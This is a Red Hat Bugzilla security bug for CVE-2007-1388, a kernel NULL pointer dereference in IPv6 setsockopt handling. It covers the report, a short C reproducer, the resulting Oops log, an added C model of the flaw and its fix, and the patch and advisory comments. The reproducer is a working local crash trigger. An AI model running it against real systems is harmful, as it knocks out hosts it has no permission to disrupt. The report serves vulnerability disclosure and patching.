Bug 232255 - CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Platform: All Linux
Priority: medium
Severity: high
Assigned To: Don Howard
QA Contact: Martin Jenner
Whiteboard: impact=important,source=vendorsec,rep...
Keywords: Security
Reported: 2007-03-14 12:00 EDT by Marcel Holtmann
Modified: 2007-11-30 17:07 EST
Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Last Closed: 2007-04-30 12:37:48 EDT

Description Marcel Holtmann 2007-03-14 12:00:56 EDT
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
At line 417, opt can be NULL and is dereferenced:
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


These few lines reproduce the bug:

#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char **argv)
{
	int s, optval = 0;

	/* Any fresh AF_INET6 socket will do: with no sticky options set and
	 * optlen 0, IPV6_RTHDR makes ipv6_renew_options() return NULL. */
	s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
	if (s < 0)
		return 1;
	setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

	return 0;
}


Kernel Oops here:

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core 8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211 ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2)
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039   edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039   esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076, threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff 00000001 00000000 f0cfce58 ee42e9c0
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00 c18e1de0 ee42e9c0 c18e1e7c 00000000
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c 00000000 c013c78b 00001000 c0359330
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170  <c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0  <c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059> d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6]  <c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30  <c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280  <c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83 3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6 ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40 [ipv6] SS:ESP 0068:f25a9da8
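Added illustration (not code from the report or from the kernel tree): a userspace C model of the control flow in the IPV6_RTHDR branch described above. It reproduces the kernel's ERR_PTR()/IS_ERR() convention, an ipv6_renew_options() stand-in that hands back NULL rather than an error pointer when the total option length works out to zero (no sticky options on the socket, optlen 0), and the branch written with the `opt &&` guard that the upstream fix adds. Everything else (the struct layouts, MAX_OPTLEN, the exact routing-header checks) is a simplification assumed for the model. The point it makes: IS_ERR() is true only for the top 4095 addresses, so a NULL return sails past it, and the register dump above shows the result. The fault address 00000010 is the offset of the srcrt member in struct ipv6_txoptions on i386, and `<8b> 50 10` in the Code: line is `mov 0x10(%eax),%edx` with eax = 00000000, i.e. the `opt->srcrt` load with opt == NULL.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* Kernel-style error pointers (linux/err.h), reproduced for userspace.
 * IS_ERR() is true only for the top MAX_ERRNO addresses: NULL is not one. */
#define MAX_ERRNO 4095
static inline void *ERR_PTR(long error) { return (void *)error; }
static inline long PTR_ERR(const void *ptr) { return (long)ptr; }
static inline bool IS_ERR(const void *ptr)
{
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

/* Simplified stand-ins for struct ipv6_rt_hdr and struct ipv6_txoptions. */
struct rt_hdr { unsigned char type, hdrlen, segments_left; };
struct txoptions {
	size_t other_len;	/* hop-by-hop/destination options carried over */
	struct rt_hdr hdr;	/* storage for the sticky routing header */
	struct rt_hdr *srcrt;	/* &hdr when a routing header is set, else NULL */
};
#define MAX_OPTLEN 64		/* length sanity limit (assumption of this model) */

/* Model of ipv6_renew_options() for newtype == IPV6_RTHDR. Three outcomes:
 * ERR_PTR(-errno) for a real failure, a valid pointer when there is at least
 * one option to carry, and NULL when nothing is left (no other options and
 * optlen 0). The old routing header is being replaced, so it never counts;
 * the NULL outcome is the one the vulnerable caller never checked. */
static struct txoptions *renew_options(const struct txoptions *old,
				       const struct rt_hdr *newhdr,
				       size_t newoptlen)
{
	size_t tot_len = old ? old->other_len : 0;
	struct txoptions *opt;

	if (newoptlen > MAX_OPTLEN)
		return ERR_PTR(-EINVAL);
	if (newhdr && newoptlen)
		tot_len += newoptlen;
	if (!tot_len)
		return NULL;

	opt = calloc(1, sizeof(*opt));
	if (!opt)
		return ERR_PTR(-ENOMEM);
	opt->other_len = old ? old->other_len : 0;
	if (newhdr && newoptlen) {
		opt->hdr = *newhdr;
		opt->srcrt = &opt->hdr;
	}
	return opt;
}

/* Model of the IPV6_RTHDR branch of do_ipv6_setsockopt(), written the way the
 * fixed kernel does it: IS_ERR() catches error pointers, and the extra check
 * is guarded by "opt &&", so a NULL result means "clear the sticky option"
 * rather than a load through a NULL struct. The vulnerable code tested
 * "optname == IPV6_RTHDR && opt->srcrt" with no such guard.
 * Returns 0 or a negative errno, as the kernel does. */
static int set_rthdr(const struct txoptions *old,
		     const struct rt_hdr *newhdr, size_t newoptlen)
{
	struct txoptions *opt = renew_options(old, newhdr, newoptlen);
	int ret = 0;

	if (IS_ERR(opt))
		return (int)PTR_ERR(opt);

	/* routing header option needs extra check */
	if (opt && opt->srcrt) {
		const struct rt_hdr *rt = opt->srcrt;

		/* only a self-consistent type 0 header may become sticky */
		if (rt->type != 0 || (rt->hdrlen & 1) ||
		    (rt->hdrlen >> 1) != rt->segments_left)
			ret = -EINVAL;
	}

	/* on success the kernel would swap opt into the socket; we discard it */
	free(opt);
	return ret;
}

int main(void)
{
	struct rt_hdr good = { .type = 0, .hdrlen = 4, .segments_left = 2 };
	struct rt_hdr bad = { .type = 0, .hdrlen = 3, .segments_left = 1 };

	printf("IS_ERR(NULL)              = %d\n", IS_ERR(NULL));
	printf("report's trigger, len 0  -> %d\n", set_rthdr(NULL, NULL, 0));
	printf("well-formed type 0 header -> %d\n", set_rthdr(NULL, &good, sizeof good));
	printf("inconsistent header       -> %d\n", set_rthdr(NULL, &bad, sizeof bad));
	printf("oversize header           -> %d\n", set_rthdr(NULL, &good, MAX_OPTLEN + 1));
	return 0;
}
```

With the guard in place, the reporter's trigger (no sticky options, optlen 0) returns 0 and simply clears the routing header; drop the `opt &&` from the check in set_rthdr() and the same call reads through a NULL pointer, which is what the Oops records. The same lesson applies to any caller of a function that can return both ERR_PTR values and NULL: IS_ERR() alone is not a sufficient check, and IS_ERR_OR_NULL() or an explicit NULL test is needed.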
Comment 3 Don Howard 2007-03-29 17:41:56 EDT
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.
Comment 5 Mike Gahagan 2007-04-26 18:13:28 EDT
verified on x86_64 system.
Comment 7 Red Hat Bugzilla 2007-04-30 12:37:48 EDT
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html
